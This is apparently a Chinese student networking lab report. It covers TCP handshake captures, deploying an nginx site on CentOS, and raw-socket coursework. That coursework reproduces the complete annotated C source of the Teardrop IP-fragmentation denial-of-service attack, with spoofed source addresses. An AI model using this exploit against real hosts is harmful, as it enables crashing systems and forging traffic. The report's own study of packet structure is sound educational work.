从TCP分析到建立web网站

1.分析TCP连接

以“金庸梦“游戏的客户端连接服务器、断开服务器为例，用wireshark抓包分析TCP协议的三次握手连接、四次握手断开，与计算机网络原理进行验证；

打开之前编写的“金庸梦”客户端程序
连接游戏建立连接，退出游戏释放连接

wireshark抓包，过滤出相应的TCP流

No.49-No.51 的TCP包为三次握手建立连接
No.59-No.62 的TCP包为四次握手释放连接

用Fiddler抓包，分析验证一个HTTPS网站的TCP连接过程

Fiddler抓包工具总结
fiddler下载
fiddler和wireshark对比
fiddler 入门 （一）安装 、界面

打开fiddler，开始抓包
打开百度的页面

随便选一个抓取到的图片

2.网络编程技术实践

1. 完成“网络编程技术”参考书上 “2.11
原始套接字编程”中的Teardrop代码编程，伪造一个虚假地址的IP包，包的内容填入Fake
News。发送此包。并用wireshark抓包进行验证。

通过 Teardrop 攻击程序学习自制 IP 包及了解包的结构

代码（来自上文链接博客）

#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 

#ifdef STRANGE_BSD_BYTE_ORDERING_THING
/* OpenBSD < 2.1, all FreeBSD and netBSD, BSDi < 3.0 */
#define FIX(n)  (n)
#else  
/* OpenBSD 2.1, all Linux */
#define FIX(n)  htons(n)
#endif  /* STRANGE_BSD_BYTE_ORDERING_THING */

#define IP_MF 0x2000  /* More IP fragment en route */
#define IPH 0x14    /* IP header size */
#define UDPH 0x8     /* UDP header size */
#define PADDING  0x1c    /* datagram frame padding for first packet */
#define MAGIC  0x3     /* Magic Fragment Constant (tm).  Should be 2 or 3 */
#define COUNT 0x1  
/* Linux dies with 1, NT is more stalwart and can
 * withstand maybe 5 or 10 sometimes...  Experiment.
 */

//错误处理函数
void usage(u_char *);
//获取主机信息
u_long name_resolve(u_char *);
//设置 IP 包的内容并发送
void send_frags(int ,u_long,u_long,u_short,u_short);

//主函数
int main(int argc,char **argv)
{
     
    int one = 1, count = 0, i, rip_sock;
    //定义无符号长整型源 IP 和目的 IP
    u_long src_ip = 0, dst_ip = 0;
    //定义无符号短整型源端口号和目的端口号
    u_short src_prt = 0, dst_prt = 0;
    /*
    定一个结构体 in_addr（表示一个32位的IPv4地址）的一个对象
    struct in_addr
    {
        union
        {
            struct
            {
                u_char s_b1,s_b2,s_b3,s_b4;
            } S_un_b; //An IPv4 address formatted as four u_chars.
            struct
            {
                u_short s_w1,s_w2;
            } S_un_w; //An IPv4 address formatted as two u_shorts
            u_long S_addr;//An IPv4 address formatted as a u_long
        } S_un;
        #define s_addr S_un.S_addr
    };
    */
    struct in_addr addr;
    printf("teardrop route|daemon9\n\n");

    /*
    创建一个原始套接字
    AF_INET——IPv4地址；
    SOCK_RAW——原始的套接字类型
    IPPROTO_RAW——允许使用底层的套接字协议，就可以自己编写IP包
    如果创建套接字成功，则会返回一个描述符（int型），失败则会返回 INVALID_SOCKET
    每个电脑里面都会有一个描述符表，对应套接字
    如果创建失败，将错误消息输出到屏幕
    然后退出程序
    */
    if((rip_sock = socket(AF_INET,SOCK_RAW,IPPROTO_RAW)) < 0)
    {
     
	fprintf(stderr,"raw socket");
	exit(1);
    }

    /*
    设置原始套接字选项 IP_HDRINCL
    如果不设置这个选项，IP 协议会自动填充 IP 数据包的首部
    这个情况是我们所不需要的，我们需要自己编写 IP 包
    */
    if(setsockopt(rip_sock,IPPROTO_IP,IP_HDRINCL,(char *)&one,sizeof(one)) < 0)
    {
     
        fprintf(stderr,"IP_HDRINCL");
        exit(1);
    }

    /*
    如果程序运行时送给main函数的命令行参数个数小于 3 个，
    调用 usage 函数，传参为 argv[0]：指向程序运行的全路径名
    */
    if(argc < 3)
        usage(argv[0]);

    //调用 name_resolve 函数设置源 IP 和目的 IP 
    if(!(src_ip = name_resolve(argv[1])) || !(dst_ip = name_resolve(argv[2])))
    {
     
        fprintf(stderr,"What the hell kind of IP address is that?\n");
        exit(1);
    }

    /*
    调用 getopt 函数分析命令行参数，该函数的参数含义：
    ——命令行参数个数（argc）
    ——命令行参数内容（argv）
    ——参数格式（opstring）：字母后有 : 表示该选项后面必须跟参数
    getopt 函数处理不符合 optstring 指定的选项
    并将选项后的参数保存在 optarg 中
    然后返回选项的 ASCLL 码

    atoi 函数是将参数（optarg）转化为十进制（会跳过前面的空白字符）
    如果不能转化为十进制，则返回 0 ，值过大返回 -1

    该循环语句是为了从命令行传端口值
    */
    while((i = getopt(argc, argv, "s:t:n:")) != EOF)
    {
     
        switch (i)
        {
     
        case 's'://源端口(重点)
        src_prt = (u_short)atoi(optarg);
            break;
        case 't'://目的端口 (DNS，任何人？)
        dst_prt = (u_short)atoi(optarg);
            break;
        case 'n'://设置发送包的个数
        count = atoi(optarg);
            break;
        default:
        usage(argv[0]);
            break;
        }
    }
    /*
    srandom 函数：设置种子值（以“当前时间 + 进程 ID”作为种子）
    如果前面设置的源端口和目的端口是零，则随机赋值
    */
    srandom((unsigned)(utimes("0",(time_t)0)));
    if(!src_prt)
        src_prt = (random() % 0xffff);//设置随机源端口号
    if(!dst_prt)
        dst_prt = (random() % 0xffff);//设置随即目的端口号
    if(!count)
        count = COUNT;//设置默认为一个包
    //inet_ntoa 函数：将一个IP转换成一个互联网标准点分格式的字符串
    printf("Death on flaxen wings:\n");
    addr.s_addr = src_ip;//给对象 addr 的成员变量赋值
    printf("From:%15s.%5d\n",inet_ntoa(addr), src_prt);
    addr.s_addr = dst_ip;//给对象 addr 的成员变量 赋值
    printf("To:%15s.%5d\n",inet_ntoa(addr), dst_prt);
    printf("Amt:%5d\n",count);
    printf("[\n");

    /*
    循环调用 send_frags 函数
    每一次循环完了后睡眠 0.5 s
    */
    for (i = 0; i < count; i++)
    {
     
        send_frags(rip_sock,src_ip,dst_ip,src_prt,dst_prt);
        usleep(500);
    }
    printf("]\n");
    return (0);
}

//设置 IP 包的内容并发送
void send_frags(int sock,u_long src_ip,u_long dst_ip,u_short src_prt,u_short dst_prt)
{
     
    u_char *packet = NULL, *p_ptr = NULL,*flag = NULL;//定义 IP 包指针
    u_char byte;//无符号字符储存二进制
    struct sockaddr_in sin;
    /*
    sockaddr 套接字协议结构
    用于存储参与（IP）Windows/linux套接字通信的计算机上的一个internet协议（IP）地址
    struct sockaddr {
        unsigned short sa_family; //address family, AF_xxx
        char sa_data[14]; //14 bytes of protocol address
    };
    */
    sin.sin_family = AF_INET;//IPv4地址
    sin.sin_port = src_prt;//源端口
    sin.sin_addr.s_addr = dst_ip;//目的 IP
    /*
    malloc 函数：
    原型：extern void *malloc(unsigned int num_bytes);
    功能：分配长度为num_bytes字节的内存块(这里分配了 56 个字节的内存块)
    说明：分配成功则返回指向被分配内存的指针，否则返回空指针 NULL
    */
    packet = (u_char *)malloc(IPH + UDPH + PADDING);
    p_ptr = packet;//指向 IP 包内存地址
    flag = packet;
    /*
    bzero 函数：
    原型：extern void bzero(void *s, int n);
    功能：置字节字符串前n个字节为零且包括‘\0’，无返回值
    这里是将 IP 包的 56 个字节全部至空
    */
    bzero((u_char *)p_ptr,IPH + UDPH + PADDING);
    /*
    设置 IP 包的Version（版本）和Hlen（长度）
    大多数的 IP 包都是以 4500 开头的（十六进制） 
    */
    byte = 0x45;
    /*
    memcpy 函数：
    原型：void *memcpy(void *destin, void *source, unsigned n);
    功能：从源内存地址的起始位置开始拷贝若干个字节到目标内存地址中
                    即从源source中拷贝n个字节到目标destin中
    这里是指从 byte 的内容（0x45）拷贝到 IP 包中
    */
    memcpy(p_ptr, &byte, sizeof(u_char));
    p_ptr += 2;// 此时默认 IP 包的 TOS（优先级）为 0
    /*
    FIX 函数（htons 函数的别名）
    htons 函数：将一个无符号短整型的主机数值转换为网络字节顺序
                                即大尾顺序(big-endian)
    这里是设置 Datagram Total Length（IP 包总长度）
    */
    *((u_short *)p_ptr) = FIX(IPH + UDPH + PADDING);
    p_ptr += 2;
    //这是是设置 identifier（IP 包标识）
    *((u_short *)p_ptr) = htons(242);//IP id
    p_ptr += 2;
    //这里设置 Flags（标志）
    *((u_short *)p_ptr) |= FIX(IP_MF);
    p_ptr += 2;
    //设置 TTL （存活期）
    *((u_short *)p_ptr) = 0x40;
    //设置 Protocol（协议）
    byte = IPPROTO_UDP;
    memcpy(p_ptr + 1, &byte, sizeof(u_char));
    //IP 的校验码由实时操作系统设置
    p_ptr += 4;
    //设置 IP 包的 Source Address（源地址）
    *((u_long *)p_ptr) = src_ip;
    p_ptr += 4;
    //设置 IP 包的 Destination Address（目的地址）
    *((u_long *)p_ptr) = dst_ip;
    p_ptr += 4;
    //设置 UDP 的源端口
    *((u_short *)p_ptr) = htons(src_prt);
    p_ptr += 2;
    //设置 UDP 的目的端口
    *((u_short *)p_ptr) = htons(dst_prt);
    p_ptr += 2;
    //设置 UDP 的数据长度
    *((u_short *)p_ptr) = htons(PADDING);
    p_ptr += 4;
    /*
    设置要发送的数据：Fake News
    根据 ASCLL 码表可转换成 46 61 6B 65 20 4E 65 77 73
    */
    *((u_short *)p_ptr) = 0x46;
    p_ptr++;
    *((u_short *)p_ptr) = 0x61;
    p_ptr++;
    *((u_short *)p_ptr) = 0x6B;
    p_ptr++;
    *((u_short *)p_ptr) = 0x65;
    p_ptr++;
    *((u_short *)p_ptr) = 0x20;
    p_ptr++;
    *((u_short *)p_ptr) = 0x4E;
    p_ptr++;
    *((u_short *)p_ptr) = 0x65;
    p_ptr++;
    *((u_short *)p_ptr) = 0x77;
    p_ptr++;
    *((u_short *)p_ptr) = 0x73;
    /*
    sendto 函数：指向一指定目的地发送数据
		将指定字节数的数据发送到指定的终结点
		sendto()适用于发送未建立连接的UDP数据报（参数为SOCK_DGRAM）
    返回值：为整型，如果成功，则返回发送的字节数，失败则返回SOCKET_ERROR
    发送 IPv4 包，下面这个条件语句发送失败才会执行
    */
    int i=1;
    while(i <= 56)
    {
     
	printf("%x\t",*flag);
	flag++;
        if(0 == i%8)
	    printf("\n");
        i++;
    }
    if(sendto(sock, packet, IPH + UDPH + PADDING, 0, (struct sockaddr *)&sin, sizeof(struct sockaddr)) == -1)
    {
     
        fprintf(stderr, "\nsendto");
        free(packet);//释放 packet 指针
        exit(1);
    }
    //IP total length is 2 bytes into the header
    //IP 包总长度是2字节，放进头部
    p_ptr = &packet[2];
    *((u_short *)p_ptr) = FIX(IPH + MAGIC + 1);
    //IP offset is 6 bytes into the header
    p_ptr += 4;
    *((u_short *)p_ptr) = FIX(MAGIC);
    //发送 UDP 包，下面这个条件语句发送失败才会执行
    if(sendto(sock, packet, IPH + MAGIC + 1, 0, (struct sockaddr *)&sin, sizeof(struct sockaddr)) == -1)
    {
     
        fprintf(stderr, "\nsendto");
        free(packet);
        exit(1);
    }
    free(packet);
}

//获取主机信息
u_long name_resolve(u_char *host_name)
{
     
    struct in_addr addr;//32位 IPv4 地址
    /*
    hostent 结构体：该结构记录主机的信息，包括主机名、别名、地址类型、地址长度和地址列表
    struct hostent {
        char *h_name;
        char **h_aliases;
        int h_addrtype;
        int h_length;
        char **h_addr_list;
    };
    #define h_addr h_addr_list[0]
    */
    struct hostent *host_ent;
    /*
    gethostbyname 函数：返回对应于给定主机名的包含主机名字和地址信息的hostent结构指针
    bcopy 函数：将第一个参数（字符串）的前n（第三个参数）个字节复制到第二个参数中
    */
    if((addr.s_addr = inet_addr(host_name)) == -1)
    {
     
        if(!(host_ent = gethostbyname(host_name)))
            return (0);
        bcopy(host_ent->h_addr, (char *)&addr.s_addr, host_ent->h_length);
    }
    return (addr.s_addr);
}

//错误处理函数
void usage(u_char *name)
{
     
    fprintf(stderr, "%s src_ip dst_ip [ -s src_prit ] [ -t dst_prt ] [ -n how_many  ]\n",name);
    exit(0);
}

2. 完成“网络编程技术”参考书上 “2.12
SOCKET应用实例”中的两个编程实例，并在ubuntu与树莓派之间进行验证。如果IPv6无法通过，可只完成IPv4的协议代码。

3.完成一个WEB网站

3. 尽你所学（采用html、或CSS、或Javascript等）完成一个静态网页，比如制作一个简单的个人介绍网页，至少包含一张图片、一个二级网页跳转链接和一个文件下载链接；将制作的网页资料上传至Ubuntu系统，用ngnix完成一个简单web网站。

一文读懂 Nginx
[CENTOS7] [IPTABLES] 卸载Firewall Id安装 IPTABLES及防火墙设置
vultr官网
centos8的80端口不通问题记录

1.部署web服务器

为了完成一个可以随时随地访问的web网站
我们首先需要一个服务器
这里我选择的是Vultr的服务器（因为还剩6刀的余额= =）

选择的是Cloud Computer
然后选择的是CentOS，因为CentOS比起Ubuntu更适合作为服务器
资费当然选择的是最便宜的了

这就部署好了
之后用Xshell连接我们的主机

2.安装Nginx

ubuntu安装nginx启动服务如下

sudo apt install nginx
service nginx start

CentOS是不同于Ubuntu的
因为我这个是刚刚部署的服务器，需要配置环境
1.安装GCC

yum -y install gcc
yum -y install gcc automake autoconf libtool make
yum install gcc gcc-c++

2、pcre、pcre-devel安装

yum install -y pcre pcre-devel

3、zlib安装

yum install -y zlib zlib-devel

4、安装openssl

yum install -y openssl openssl-devel

5.在官网下载，现在最新的稳定版本是1.18.0版本的
Nginx下载

wget -c https://nginx.org/download/nginx-1.18.0.tar.gz

6.解压

tar -zxvf nginx-1.18.0.tar.gz

7.编译安装

cd nginx-1.18.0/
./configure

make
make install

这样就安装好了

3.启动Niginx

cd /usr/local/nginx/sbin/  #CentOS中nginx的启动方式
./nginx -t #检查配置文件是否正确无误
./nginx #CentOS中nginx的启动方式，第二步
ps -aux | grep nginx

这时候发现出错

经过排查，发现是CentOS8有个自带的firewalld防火墙，关闭后就正常了
并与之相比较，ubuntu系统主要通过的就是iptables来控制访问，系统自带的ufw没有多加限制
我们可以停止firewalld，换上iptables来达到我们的目的

systemctl stop firewalld   #卸载Firewall ID，重装IPTABLES：先停止服务
systemctl mask firewalld
 
yum install iptables-services

systemctl enable iptables  #开机启动IPTABLES：

systemctl [stop|start|restart] iptables  #管理服务

/sbin/iptables -I INPUT -p tcp --dport 80 -j ACCEPT   #开放端口： 
service iptables save  #永久保存IPTABLES设置：

到这里，我们的网页的后端就部署完毕，可以专心编写前端了！

常用命令：

./nginx -v 					#查看版本
./nginx -s reload          #重启nginx
./nginx -s stop             #停止nginx
./nginx -s quit            #推荐使用 ./nginx -s quit
./nginx -s reload			#重新加载nginx配置
 lsof -i:80                  #查看80端口占用

4.web网站之Nginx.conf的配置

先在本地编写好html和css代码
之后通过xftp上传到服务器上

接下来我们来配置nginx.conf文件
进入conf文件夹

cd /usr/local/nginx/conf
nano nginx.conf

user 改成nginx

#user  nginx;
worker_processes  1;

#error_log  logs/error.log;
#error_log  logs/error.log  notice;
#error_log  logs/error.log  info;

#pid        logs/nginx.pid;


events {
     
    worker_connections  1024;
}

接下来是sever
只需要改变location和index就可以了

  server {
     
	listen       80;
        server_name  localhost;

       	#charset koi8-r;

       	#access_log  logs/host.access.log  main;

        location / {
     
            root   /usr/local/eininbebop.com;
            index  ein.html;
        }

可以参考：
centos7 yum 安装 配置 nginx
CentOS 8 下 nginx 服务器安装及配置笔记
centos8如何安装配置nginx

5.打开网站

最后完成的个人简介
页面一：

页面二：

4. 学习“网络编程技术”参考书上“4.8.2 HTTP
客户端编程方法”，用C#完成一个简易图形界面的基于HTTP协议的浏览器客户端软件。

5. 学习LibCurl库，编程练习

1）基本的http GET/POST操作；

2）获取html网页、网页下载保存；

3）文件的断点续传